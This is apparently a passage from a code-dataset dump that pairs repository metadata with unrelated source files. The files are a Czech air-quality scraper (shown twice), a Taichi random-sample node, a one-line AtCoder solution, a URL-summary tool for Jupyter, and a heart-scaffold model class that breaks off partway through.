0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", 
"category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6990642401408729096, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}], "cursor": "eyJ2IjoiNzAwNzI1MjQ2NDcyNjQ1ODM5OSIsImkiOjMzODB9", "count": 11060, "has_more": true} | [
"www.1759633997@qq.com"
] | www.1759633997@qq.com |
bfb953ab310f302eb8ffded9021eab8dcf3d59c9 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/J/jindrichmynarz/air_pollution.py | 2f4733075ffae9ef96d3f49abd1b74a7777bbad3 | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,030 | py | ####################################
# Informace o kvalitě ovzduší v ČR #
####################################
import datetime, re, scraperwiki, urlparse
from BeautifulSoup import BeautifulSoup
def getEvaluation(node):
    """Return the measured value from a results cell, or a status message.

    Parameters:
        node: a BeautifulSoup <td> element whose <span> child carries the
            measurement text (possibly with a decimal comma and spaces).

    Returns a string: the numeric value when present; otherwise a Czech
    status message derived from the cell's background colour, or "" when
    the colour is unrecognised.
    """
    # Normalise the decimal comma and strip spaces before matching.
    # NOTE: do not .encode("utf8") first — on Python 3 that yields bytes,
    # and str arguments to bytes.replace() raise TypeError.
    text = node.find("span").text.replace(",", ".").replace(" ", "")
    evaluation = re.match(r"\d+(\.\d+)?", text)
    if evaluation:
        return evaluation.group()
    # No number present: the cell colour encodes the measurement status.
    style = node["style"]
    if style == "background-color: white":
        return "Neúplná data"  # incomplete data
    if style == "background-color: #CFCFCF":
        return "Veličina se na uvedené stanici neměří"  # not measured at this station
    return ""
def reformatDate(text):
    """Convert a Czech "DD.MM.YYYY HH:MM" timestamp to an ISO 8601 string.

    Returns e.g. "2021-09-15T16:04:00+01:00"; the +01:00 (CET) offset is
    hard-coded. Raises AttributeError when *text* does not match the
    expected format (as the original did).
    """
    match = re.match(
        r"(?P<day>\d{2})\.(?P<month>\d{2})\.(?P<year>\d{4})\s+(?P<hours>\d{2}):(?P<minutes>\d{2})",
        text
    )
    # NOTE: map() returns a lazy iterator on Python 3, so the previous
    # "{0[0]}"-style indexing of map(match.group, ...) raised TypeError.
    # Index the named groups directly instead.
    return "{0[year]}-{0[month]}-{0[day]}T{0[hours]}:{0[minutes]}:00+01:00".format(
        match.groupdict()
    )
def reformatCoords(text):
    """Split a Czech coordinate string ("… sš … vd") into (latitude, longitude).

    The degree sign is dropped, the prime mark is normalised to "'", and the
    hemisphere markers "sš" (north latitude) / "vd" (east longitude) become
    "N" / "E" suffixes.
    """
    # NOTE: the previous .encode("utf-8") yields bytes on Python 3, and
    # str arguments to bytes.replace() raise TypeError — work on the text
    # directly (also fine for Python 2 unicode).
    normalised = (
        text.replace(" sš ", "N\n")
            .replace(" vd", "E")
            .replace("°", "")
            .replace("´", "'")
    )
    latitude, longitude = normalised.split("\n")
    return latitude, longitude
def scrapeWeatherStation(url):
    # Fetch a station detail page and pull its geographic position from
    # the first HTML table: the last cell starts with the altitude in
    # metres, the third-from-last holds the latitude/longitude text.
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    tds = soup.find("table").findAll("td")
    altitude = re.match("\d+", tds[-1].text).group()
    latitude, longitude = reformatCoords(tds[-3].text)
    return latitude, longitude, altitude
# Save the column-header metadata describing the records stored below.
scraperwiki.sqlite.save_var(
    "data_columns",
    [
        "code", "name", "owner",
        "province", # region ("kraj")
        "latitude", "longitude", "altitude",
        "time", "airquality", "SO2_1h",
        "NO2_1h", "CO_1h", "O3_1h", "PM10_1h",
        "PM10_24h"
    ]
)
# Fetch the CHMI page with the current hourly air-quality data.
startingUrl = "http://portal.chmi.cz/files/portal/docs/uoco/web_generator/actual_hour_data_CZ.html"
html = scraperwiki.scrape(startingUrl)
soup = BeautifulSoup(html)
# The first table holds all region headers and station measurement rows.
table = soup.find("table")
trs = table.findAll("tr")
for tr in trs:
    ths = tr.findAll("th")
    tds = tr.findAll("td")
    # The (td count, th count) pair identifies the row type.
    rowSignature = (len(tds), len(ths))
    if rowSignature == (0, 9):
        # Region header row: region name ("Kraj: ...") plus timestamp.
        th = tr.find("th")
        province = th.text.replace("Kraj: ", "")
        th = th.findNext().text
        date = reformatDate(th)
    elif rowSignature == (0, 10):
        # Column caption row — nothing to extract.
        pass
    elif rowSignature == (10, 1):
        # Secondary header row — nothing to extract.
        pass
    elif rowSignature == (11, 0):
        # Measurement row for a single station.
        td = tr.find("td")
        identifier = td.find("a")
        code = identifier.text
        weatherStationUrl = urlparse.urljoin(startingUrl, identifier["href"])
        latitude, longitude, altitude = scrapeWeatherStation(weatherStationUrl)
        td = td.findNext().findNext()
        name = td.text
        td = td.findNext()
        owner = td.text
        td = td.findNext()
        airquality = getEvaluation(td)
        td = td.findNext("td")
        SO2_1h = getEvaluation(td)
        td = td.findNext("td")
        NO2_1h = getEvaluation(td)
        td = td.findNext("td")
        CO_1h = getEvaluation(td)
        td = td.findNext("td")
        O3_1h = getEvaluation(td)
        td = td.findNext("td")
        PM10_1h = getEvaluation(td)
        # The 24h PM10 average sits two cells further on.
        td = td.findNext("td").findNext("td")
        PM10_24h = getEvaluation(td)
        # Store one record per station code; the record date re-parses
        # the ISO timestamp ([:-2] drops the two UTC-offset fields).
        scraperwiki.datastore.save(["code"], {
            "code" : code,
            "name" : name,
            "owner" : owner,
            "province" : province,
            "latitude" : latitude,
            "longitude" : longitude,
            "altitude" : altitude,
            "time" : date,
            "airquality" : airquality,
            "SO2_1h" : SO2_1h,
            "NO2_1h" : NO2_1h,
            "CO_1h" : CO_1h,
            "O3_1h" : O3_1h,
            "PM10_1h" : PM10_1h,
            "PM10_24h" : PM10_24h,
        }, date = datetime.datetime(*map(int, re.split('[^\d]', date)[:-2])))
    else:
        # Unexpected row layout — fail loudly so layout changes are noticed.
        raise Exception
####################################
# Informace o kvalitě ovzduší v ČR #
####################################
import datetime, re, scraperwiki, urlparse
from BeautifulSoup import BeautifulSoup
def getEvaluation(node):
    """Extract the numeric reading from a table cell, or a status message.

    The cell's <span> text is normalised (decimal comma -> dot, spaces
    stripped) and matched as a number; if it is not numeric, the cell's
    background colour determines the Czech status message returned.
    """
    raw = node.find("span").text.encode("utf8").replace(",", ".").replace(" ", "")
    match = re.match("\d+(\.\d+)?", raw)
    if match:
        return match.group()
    style = node["style"]
    if style == "background-color: white":
        return "Neúplná data"
    if style == "background-color: #CFCFCF":
        return "Veličina se na uvedené stanici neměří"
    return ""
def reformatDate(text):
    """Convert a Czech 'DD.MM.YYYY HH:MM' timestamp into an ISO 8601
    string with the fixed +01:00 (CET) offset.

    Raises AttributeError if *text* does not match the expected format
    (same failure mode as before: ``match`` is None).
    """
    match = re.match(
        "(?P<day>\d{2})\.(?P<month>\d{2})\.(?P<year>\d{4})\s+(?P<hours>\d{2}):(?P<minutes>\d{2})",
        text
    )
    # list() keeps the result subscriptable on Python 3, where map()
    # returns an iterator (the original code broke there).
    parts = list(map(match.group, ["year", "month", "day", "hours", "minutes"]))
    return "{0[0]}-{0[1]}-{0[2]}T{0[3]}:{0[4]}:00+01:00".format(parts)
def reformatCoords(text):
    # Converts a Czech coordinate string (e.g. "50°06´ sš 14°26´ vd")
    # into a (latitude, longitude) pair: " sš " (severní šířky, northern
    # latitude) becomes "N" plus a newline used as the split point, and
    # " vd" (východní délky, eastern longitude) becomes "E"; degree and
    # prime marks are stripped/normalised.
    # NOTE(review): relies on Python 2 semantics — .encode() yields a
    # byte str whose .replace() accepts the non-ASCII str literals below.
    latitude, longitude = text.encode("utf-8").replace(" sš ", "N\n").replace(" vd", "E").replace("°", "").replace("´", "'").split("\n")
    return latitude, longitude
def scrapeWeatherStation(url):
    # Fetch a station detail page and pull its geographic position from
    # the first HTML table: the last cell starts with the altitude in
    # metres, the third-from-last holds the latitude/longitude text.
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    tds = soup.find("table").findAll("td")
    altitude = re.match("\d+", tds[-1].text).group()
    latitude, longitude = reformatCoords(tds[-3].text)
    return latitude, longitude, altitude
# Save the column-header metadata describing the records stored below.
scraperwiki.sqlite.save_var(
    "data_columns",
    [
        "code", "name", "owner",
        "province", # region ("kraj")
        "latitude", "longitude", "altitude",
        "time", "airquality", "SO2_1h",
        "NO2_1h", "CO_1h", "O3_1h", "PM10_1h",
        "PM10_24h"
    ]
)
# Fetch the CHMI page with the current hourly air-quality data.
startingUrl = "http://portal.chmi.cz/files/portal/docs/uoco/web_generator/actual_hour_data_CZ.html"
html = scraperwiki.scrape(startingUrl)
soup = BeautifulSoup(html)
# The first table holds all region headers and station measurement rows.
table = soup.find("table")
trs = table.findAll("tr")
for tr in trs:
    ths = tr.findAll("th")
    tds = tr.findAll("td")
    # The (td count, th count) pair identifies the row type.
    rowSignature = (len(tds), len(ths))
    if rowSignature == (0, 9):
        # Region header row: region name ("Kraj: ...") plus timestamp.
        th = tr.find("th")
        province = th.text.replace("Kraj: ", "")
        th = th.findNext().text
        date = reformatDate(th)
    elif rowSignature == (0, 10):
        # Column caption row — nothing to extract.
        pass
    elif rowSignature == (10, 1):
        # Secondary header row — nothing to extract.
        pass
    elif rowSignature == (11, 0):
        # Measurement row for a single station.
        td = tr.find("td")
        identifier = td.find("a")
        code = identifier.text
        weatherStationUrl = urlparse.urljoin(startingUrl, identifier["href"])
        latitude, longitude, altitude = scrapeWeatherStation(weatherStationUrl)
        td = td.findNext().findNext()
        name = td.text
        td = td.findNext()
        owner = td.text
        td = td.findNext()
        airquality = getEvaluation(td)
        td = td.findNext("td")
        SO2_1h = getEvaluation(td)
        td = td.findNext("td")
        NO2_1h = getEvaluation(td)
        td = td.findNext("td")
        CO_1h = getEvaluation(td)
        td = td.findNext("td")
        O3_1h = getEvaluation(td)
        td = td.findNext("td")
        PM10_1h = getEvaluation(td)
        # The 24h PM10 average sits two cells further on.
        td = td.findNext("td").findNext("td")
        PM10_24h = getEvaluation(td)
        # Store one record per station code; the record date re-parses
        # the ISO timestamp ([:-2] drops the two UTC-offset fields).
        scraperwiki.datastore.save(["code"], {
            "code" : code,
            "name" : name,
            "owner" : owner,
            "province" : province,
            "latitude" : latitude,
            "longitude" : longitude,
            "altitude" : altitude,
            "time" : date,
            "airquality" : airquality,
            "SO2_1h" : SO2_1h,
            "NO2_1h" : NO2_1h,
            "CO_1h" : CO_1h,
            "O3_1h" : O3_1h,
            "PM10_1h" : PM10_1h,
            "PM10_24h" : PM10_24h,
        }, date = datetime.datetime(*map(int, re.split('[^\d]', date)[:-2])))
    else:
        # Unexpected row layout — fail loudly so layout changes are noticed.
        raise Exception
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
7b28757dca0e9585daaacf0aae60298e6545f140 | ebb63b057a82b8a10df305252cbcda4186ec02f7 | /taichi_blend/bundle-packages/melt/random_generator.py | b5cab4edc76ffef734527c01ec5d9bf5e01957b7 | [] | no_license | yjchoi1/taichi_blend | aa2d6f0129c8068b9a2c8bb5a7677b3c60923d5b | 907fdbee6027375324c9605ffc14db16e590f992 | refs/heads/master | 2023-03-21T12:31:04.126621 | 2021-03-01T15:06:13 | 2021-03-01T15:06:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 578 | py | from . import *
@A.register
class Def(IField):
    '''
    Name: random_generator
    Category: sampler
    Inputs: min:c max:c dim:i
    Output: sample:f
    '''
    # Field node yielding uniform random samples in [min, max); with
    # dim == 0 each lookup is a scalar, otherwise a dim-component vector.
    # NOTE(review): the docstring above appears to be structured metadata
    # parsed by the registration system — keep its exact format.
    def __init__(self, min=0, max=1, dim=0):
        self.min = min
        self.max = max
        self.dim = dim
    @ti.func
    def random(self):
        # One uniform sample scaled into [min, max).
        return ti.random() * (self.max - self.min) + self.min
    @ti.func
    def _subscript(self, I):
        # ti.static resolves the branch at compile time based on dim.
        if ti.static(self.dim == 0):
            return self.random()
        else:
            return ti.Vector([self.random() for i in range(self.dim)])
| [
"1931127624@qq.com"
] | 1931127624@qq.com |
c430daf78308008c1535ac302c6886333d61e02f | 397e125e94f4f139f2bf5055824d81f24b8b1757 | /ABC/010/handle_name.py | 6ce801becb568a35b0f0c7f0da87e9d3c2d3e015 | [] | no_license | tails1434/Atcoder | ecbab6ee238e3f225551297db961b1b502841fa4 | e7c7fed36be46bbaaf020a70997842240ba98d62 | refs/heads/master | 2021-07-07T00:31:49.235625 | 2020-09-30T01:42:01 | 2020-09-30T01:42:01 | 189,009,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28 | py | S = input()
print(S + 'pp')  # append "pp" to the handle name read above
"sososo1333@gmail.com"
] | sososo1333@gmail.com |
62bdf3e1d053de1b7c4bac023a257cd463d2a679 | d237e2624a30007bf8b1934057cd667f54245d40 | /url_summary/url_summary.py | 519893a361d74494357492e3d764243feefc29e2 | [
"MIT"
] | permissive | xidianwang412/url-summary | 8b64c6b374ecf155dd17de53c00eb4b9d2765177 | affb4a08d08d1c79d2df40cb318ae40d531e9583 | refs/heads/master | 2023-04-25T17:40:59.757519 | 2018-05-29T21:26:10 | 2018-05-29T21:26:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,826 | py | from collections import defaultdict
import random
from uuid import uuid4
from six.moves.urllib.parse import (
urlsplit, parse_qsl, ParseResult, urlunsplit, quote_plus)
from typing import Iterable
def get_summary(urls, top_items=20, top_urls=3, sample=True):
    # type: (Iterable[str], int, int, bool) -> UrlSummaryResult
    """ Return a summary for given list or iterable of ``urls``.
    ``top_items`` (20 by default) controls how many top-level items to show,
    and ``top_urls`` (3 by default) sets the number of random urls to show
    for each top-level item.  When ``sample`` is true the shown urls are a
    reproducible random sample; otherwise the first urls are shown.
    Returns a UrlSummaryResult: a list subclass that has a nice
    Jupyter Notebook display.
    """
    # index maps (facet kind, facet value) -> urls matching that facet;
    # value_index maps a query key -> set of its observed values.
    index = defaultdict(list)
    value_index = defaultdict(set)
    for url in urls:
        index['all', ''].append(url)
        parsed = urlsplit(url) # type: ParseResult
        index['netloc', format(parsed.netloc)].append(url)
        path = parsed.path.rstrip('/').split('/')
        # Every path prefix ("/a", "/a/b", ...) becomes its own facet.
        for i in range(1, len(path)):
            index['path start', '/'.join(path[: i + 1])].append(url)
        for k, v in _parse_qsl(parsed.query or ''):
            index['query key', '?{}'.format(k)].append(url)
            value_index[k].add(v)
            index['query key=value', '?{}={}'.format(k, v)].append(url)
    # Most frequent facets first; ties broken by facet name.
    items = sorted(index.items(), key=lambda x: (-len(x[1]), x[0]))
    summary = []
    for k, v in items[:top_items]:
        stat = {'len': len(v), 'sample': sorted(_sample(v, top_urls, sample=sample))}
        if k[0] == 'query key':
            # Number of distinct values observed for this query key
            # (k[1][1:] strips the leading '?').
            stat['len_v_set'] = len(value_index.get(k[1][1:]))
        summary.append((k, stat))
    return UrlSummaryResult(summary)
def _sample(lst, n, seed=42, sample=True):
if len(lst) <= n:
return lst
elif sample:
random.seed(seed)
return random.sample(lst, n)
else:
return lst[:n]
def _quote(s):
return quote_plus(s, safe='/')
def _parse_qsl(s):
return parse_qsl(s, keep_blank_values=True)
def _bold(x, bold=True):
return '<b style="color: black">{}</b>'.format(x) if bold else x
def _urlencode_quoted(x):
return '&'.join('{}={}'.format(k, v) for k, v in x)
class UrlSummaryResult(list):
    # List of ((field, value), stat) summary entries with a rich HTML
    # representation for Jupyter notebooks: each entry renders as a
    # collapsible <li> listing sample urls with the facet highlighted.
    def _repr_html_(self):
        # Jupyter hook: render all summary entries as a nested <ul>.
        return '<ul>{}</ul>'.format(
            '\n'.join(self._render_sample(field, value, stat)
                      for (field, value), stat in self))
    def _render_sample(self, field, value, stat):
        # Render one summary entry as a collapsible list item; the uuid
        # ties the toggle handler to this entry's <ul>.
        el_id = uuid4()
        # Using "hidden" class defined by the Jupyter notebook
        sample_elements = [self._render_url(url, field, value) for url in stat['sample']]
        if stat['len'] > len(sample_elements):
            sample_elements.append('…')
        return '''\
<li>
<span href="#" style="cursor: pointer"
onclick="\
var el = document.getElementById('{id}'); \
this.getElementsByTagName('SPAN')[0].textContent = \
el.classList.contains('hidden') ? '▼' : '►'; \
el.classList.toggle('hidden')"
>{n:,} {field}: <b>{value}</b>{extra} <span>►</span></span>
<ul id="{id}" class="hidden" style="margin-top: 0">{sample}</ul>
</li>'''.format(
            id=el_id,
            n=stat['len'],
            field=field,
            value=value,
            extra=(' ({len_v_set:,} unique values)'.format(**stat)
                   if 'len_v_set' in stat else ''),
            sample='\n'.join('<li>{}</li>'.format(el) for el in sample_elements),
        )
    def _render_url(self, url, field, value):
        # One clickable sample url with the matching facet emphasised.
        return '<a href="{href}" target="_blank">{url}</a>'.format(
            href=url, url=self._highlight(url, field, value))
    def _highlight(self, url, field, value):
        # Re-assemble *url* with the part matching (field, value) bolded.
        if field == 'all':
            return url
        parsed = urlsplit(url) # type: ParseResult
        netloc = parsed.netloc
        path = parsed.path
        query = parsed.query
        if field == 'netloc':
            netloc = _bold(parsed.netloc)
        elif field == 'path start':
            s = len(value)
            path = '{}{}'.format(_bold(parsed.path[1:s]), parsed.path[s:])
        elif field == 'query key':
            key_value = value[1:]
            query = _urlencode_quoted(
                [(_bold(_quote(k), k == key_value), _quote(v))
                 for k, v in _parse_qsl(query)])
        elif field == 'query key=value':
            key_value, value_value = value[1:].split('=', 1)
            query = _urlencode_quoted(
                [(_bold(_quote(k), bold), _bold(_quote(v), bold))
                 for bold, k, v in (
                    (k == key_value and v == value_value, k, v)
                    for k, v in _parse_qsl(query))])
        return urlunsplit((parsed.scheme, netloc, path, query, parsed.fragment))
| [
"kostia.lopuhin@gmail.com"
] | kostia.lopuhin@gmail.com |
d65d0ea1045bd8d3db1d4f75a714ca11a80b322d | 3125e84d311b099935ca819aac36dd21ec165bc7 | /mapclientplugins/scaffolddatamapperstep/model/scaffoldmodel.py | 6ba7b7e983b5ad537868491c3e7363dd33b70e3f | [
"Apache-2.0"
] | permissive | tsalemink/mapclientplugins.scaffolddatamapperstep | e3af382759d2158e4257244d092c7d7716e15265 | 2f51dac59faab3bb386aa0998a8c55896c03c123 | refs/heads/master | 2023-03-15T18:43:02.308814 | 2019-07-23T20:12:01 | 2019-07-23T20:12:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,346 | py | from math import radians
from opencmiss.zinc.graphics import Graphics
from opencmiss.zinc.material import Material
from opencmiss.zinc.status import OK as ZINC_OK
from opencmiss.utils.maths import vectorops as maths
from ..utils import zincutils
class ScaffoldModel(object):
    """Wraps a Zinc region holding a heart scaffold: loads the mesh,
    builds per-chamber surface graphics, and applies incremental
    rotations/translations driven by UI settings."""
    def __init__(self, region, material_module, file_path):
        # region: Zinc region the scaffold is loaded into.
        # material_module: Zinc material module used for chamber colours.
        # file_path: scaffold model file read into the region.
        self._region = region
        self._material_module = material_module
        self._file_path = file_path
        self._scaffold_coordinate_field = None
        self._initialise_scene()
        self._initialise_surface_material()
        self._initialise_scaffold()
        # Absolute transform settings as shown in the UI (degrees / units).
        self._settings = dict(yaw=0.0, pitch=0.0, roll=0.0, X=0.0, Y=0.0, Z=0.0)
        self._settings_change_callback = None
        # Last applied absolute values, used to derive per-call deltas.
        self._current_angle_value = [0., 0., 0.]
        self._current_axis_value = [0., 0., 0.]
    def reset_settings(self):
        # Reset UI settings to identity and notify the observer.
        # NOTE(review): does not undo transforms already applied to the
        # coordinate field, nor _current_angle/axis_value — confirm intent.
        self._settings = dict(yaw=0.0, pitch=0.0, roll=0.0, X=0.0, Y=0.0, Z=0.0)
        self._apply_callback()
    def set_settings_change_callback(self, settings_change_callback):
        self._settings_change_callback = settings_change_callback
    def _apply_callback(self):
        self._settings_change_callback()
    # --- accessors for the current transform settings ---
    def get_yaw_value(self):
        return self._settings['yaw']
    def get_pitch_value(self):
        return self._settings['pitch']
    def get_roll_value(self):
        return self._settings['roll']
    def get_X_value(self):
        return self._settings['X']
    def get_Y_value(self):
        return self._settings['Y']
    def get_Z_value(self):
        return self._settings['Z']
    def _create_surface_graphics(self):
        # Create one shaded surface graphic per heart chamber, each
        # restricted to its named subgroup and coloured by its material.
        fm = self._region.getFieldmodule()
        fm.beginChange()
        surface_right_atrium = self._scene.createGraphicsSurfaces()
        surface_right_atrium.setCoordinateField(self._scaffold_coordinate_field)
        surface_right_atrium.setSubgroupField(fm.findFieldByName('right atrium'))
        surface_right_atrium.setRenderPolygonMode(Graphics.RENDER_POLYGON_MODE_SHADED)
        surface_material = self._material_module.findMaterialByName('right atrium')
        surface_right_atrium.setMaterial(surface_material)
        surface_right_atrium.setName('display_right_atrium_surfaces')
        surface_left_atrium = self._scene.createGraphicsSurfaces()
        surface_left_atrium.setCoordinateField(self._scaffold_coordinate_field)
        surface_left_atrium.setSubgroupField(fm.findFieldByName('left atrium'))
        surface_left_atrium.setRenderPolygonMode(Graphics.RENDER_POLYGON_MODE_SHADED)
        surface_material = self._material_module.findMaterialByName('left atrium')
        surface_left_atrium.setMaterial(surface_material)
        surface_left_atrium.setName('display_left_atrium_surfaces')
        surface_right_ventricle = self._scene.createGraphicsSurfaces()
        surface_right_ventricle.setCoordinateField(self._scaffold_coordinate_field)
        surface_right_ventricle.setSubgroupField(fm.findFieldByName('right ventricle'))
        surface_right_ventricle.setRenderPolygonMode(Graphics.RENDER_POLYGON_MODE_SHADED)
        surface_material = self._material_module.findMaterialByName('right ventricle')
        surface_right_ventricle.setMaterial(surface_material)
        surface_right_ventricle.setName('display_right_ventricle_surfaces')
        surface_left_ventricle = self._scene.createGraphicsSurfaces()
        surface_left_ventricle.setCoordinateField(self._scaffold_coordinate_field)
        surface_left_ventricle.setSubgroupField(fm.findFieldByName('left ventricle'))
        surface_left_ventricle.setRenderPolygonMode(Graphics.RENDER_POLYGON_MODE_SHADED)
        surface_material = self._material_module.findMaterialByName('left ventricle')
        surface_left_ventricle.setMaterial(surface_material)
        surface_left_ventricle.setName('display_left_ventricle_surfaces')
        fm.endChange()
        return
    def _create_line_graphics(self):
        # Optional wireframe lines over the scaffold (currently unused by
        # create_scaffold_graphics).
        lines = self._scene.createGraphicsLines()
        lines.setCoordinateField(self._scaffold_coordinate_field)
        lines.setName('display_lines')
        black = self._material_module.findMaterialByName('white')
        lines.setMaterial(black)
        return lines
    def create_scaffold_graphics(self):
        # self._create_line_graphics()
        self._create_surface_graphics()
    def _initialise_scene(self):
        # Start from a clean scene for this region.
        if self._region.getScene():
            self._region.getScene().removeAllGraphics()
        self._scene = self._region.getScene()
    def get_scene(self):
        if self._scene is not None:
            return self._scene
        else:
            raise ValueError('Scaffold scene is not initialised.')
    def _initialise_surface_material(self):
        # Define the semi-transparent colour materials used per chamber.
        self._material_module.beginChange()
        trans_blue = self._material_module.createMaterial()
        trans_blue.setName('trans_blue')
        trans_blue.setManaged(True)
        trans_blue.setAttributeReal3(Material.ATTRIBUTE_AMBIENT, [0.0, 0.2, 0.6])
        trans_blue.setAttributeReal3(Material.ATTRIBUTE_DIFFUSE, [0.0, 0.7, 1.0])
        trans_blue.setAttributeReal3(Material.ATTRIBUTE_EMISSION, [0.0, 0.0, 0.0])
        trans_blue.setAttributeReal3(Material.ATTRIBUTE_SPECULAR, [0.1, 0.1, 0.1])
        trans_blue.setAttributeReal(Material.ATTRIBUTE_ALPHA, 0.3)
        trans_blue.setAttributeReal(Material.ATTRIBUTE_SHININESS, 0.2)
        right_atrium = self._material_module.createMaterial()
        right_atrium.setName('right atrium')
        right_atrium.setManaged(True)
        right_atrium.setAttributeReal3(Material.ATTRIBUTE_AMBIENT, [0.82, 0.45, 0.35])
        right_atrium.setAttributeReal3(Material.ATTRIBUTE_DIFFUSE, [0.82, 0.45, 0.35])
        right_atrium.setAttributeReal3(Material.ATTRIBUTE_EMISSION, [0.0, 0.0, 0.0])
        right_atrium.setAttributeReal3(Material.ATTRIBUTE_SPECULAR, [0.1, 0.1, 0.1])
        right_atrium.setAttributeReal(Material.ATTRIBUTE_ALPHA, 0.7)
        right_atrium.setAttributeReal(Material.ATTRIBUTE_SHININESS, 0.2)
        left_atrium = self._material_module.createMaterial()
        left_atrium.setName('left atrium')
        left_atrium.setManaged(True)
        left_atrium.setAttributeReal3(Material.ATTRIBUTE_AMBIENT, [0.79, 0.42, 0.32])
        left_atrium.setAttributeReal3(Material.ATTRIBUTE_DIFFUSE, [0.79, 0.42, 0.32])
        left_atrium.setAttributeReal3(Material.ATTRIBUTE_EMISSION, [0.0, 0.0, 0.0])
        left_atrium.setAttributeReal3(Material.ATTRIBUTE_SPECULAR, [0.1, 0.1, 0.1])
        left_atrium.setAttributeReal(Material.ATTRIBUTE_ALPHA, 0.7)
        left_atrium.setAttributeReal(Material.ATTRIBUTE_SHININESS, 0.2)
        right_ventricle = self._material_module.createMaterial()
        right_ventricle.setName('right ventricle')
        right_ventricle.setManaged(True)
        right_ventricle.setAttributeReal3(Material.ATTRIBUTE_AMBIENT, [0.71, 0.33, 0.22])
        right_ventricle.setAttributeReal3(Material.ATTRIBUTE_DIFFUSE, [0.71, 0.33, 0.22])
        right_ventricle.setAttributeReal3(Material.ATTRIBUTE_EMISSION, [0.0, 0.0, 0.0])
        right_ventricle.setAttributeReal3(Material.ATTRIBUTE_SPECULAR, [0.1, 0.1, 0.1])
        right_ventricle.setAttributeReal(Material.ATTRIBUTE_ALPHA, 0.7)
        right_ventricle.setAttributeReal(Material.ATTRIBUTE_SHININESS, 0.2)
        left_ventricle = self._material_module.createMaterial()
        left_ventricle.setName('left ventricle')
        left_ventricle.setManaged(True)
        left_ventricle.setAttributeReal3(Material.ATTRIBUTE_AMBIENT, [0.59, 0.22, 0.05])
        left_ventricle.setAttributeReal3(Material.ATTRIBUTE_DIFFUSE, [0.59, 0.22, 0.05])
        left_ventricle.setAttributeReal3(Material.ATTRIBUTE_EMISSION, [0.0, 0.0, 0.0])
        left_ventricle.setAttributeReal3(Material.ATTRIBUTE_SPECULAR, [0.1, 0.1, 0.1])
        left_ventricle.setAttributeReal(Material.ATTRIBUTE_ALPHA, 0.7)
        left_ventricle.setAttributeReal(Material.ATTRIBUTE_SHININESS, 0.2)
        self._material_module.endChange()
        return
    def _initialise_scaffold(self):
        # Load the scaffold file into the region and locate its
        # coordinate field.
        result = self._region.readFile(self._file_path)
        if result != ZINC_OK:
            raise ValueError('Failed to initiate scaffold')
        self._scaffold_coordinate_field = self._get_model_coordinate_field()
    def _get_mesh(self):
        # Highest-dimension non-empty mesh in the region.
        fm = self._region.getFieldmodule()
        for dimension in range(3, 0, -1):
            mesh = fm.findMeshByDimension(dimension)
            if mesh.getSize() > 0:
                return mesh
        raise ValueError('Model contains no mesh')
    def _get_model_coordinate_field(self):
        # First coordinate-type field (<= 3 components) defined on the
        # mesh's first element.
        mesh = self._get_mesh()
        element = mesh.createElementiterator().next()
        if not element.isValid():
            raise ValueError('Model contains no elements')
        fm = self._region.getFieldmodule()
        cache = fm.createFieldcache()
        cache.setElement(element)
        field_iter = fm.createFielditerator()
        field = field_iter.next()
        while field.isValid():
            if field.isTypeCoordinate() and (field.getNumberOfComponents() <= 3):
                if field.isDefinedAtLocation(cache):
                    return field
            field = field_iter.next()
        raise ValueError('Could not determine model coordinate field')
    def rotate_scaffold(self, angle, value):
        # Apply the *incremental* rotation needed to go from the last
        # applied absolute angle to *value* (degrees) about the given
        # Euler axis ('yaw', 'pitch' or 'roll'), then record the new
        # absolute value and notify the observer.
        next_angle_value = value
        if angle == 'yaw':
            if next_angle_value > self._current_angle_value[0]:
                angle_value = next_angle_value - self._current_angle_value[0]
            else:
                angle_value = -(self._current_angle_value[0] - next_angle_value)
            euler_angles = [angle_value, 0., 0.]
            self._current_angle_value[0] = next_angle_value
            self._settings['yaw'] = next_angle_value
        elif angle == 'pitch':
            if next_angle_value > self._current_angle_value[1]:
                angle_value = next_angle_value - self._current_angle_value[1]
            else:
                angle_value = -(self._current_angle_value[1] - next_angle_value)
            euler_angles = [0., angle_value, 0.]
            self._current_angle_value[1] = next_angle_value
            self._settings['pitch'] = next_angle_value
        else:
            if next_angle_value > self._current_angle_value[2]:
                angle_value = next_angle_value - self._current_angle_value[2]
            else:
                angle_value = -(self._current_angle_value[2] - next_angle_value)
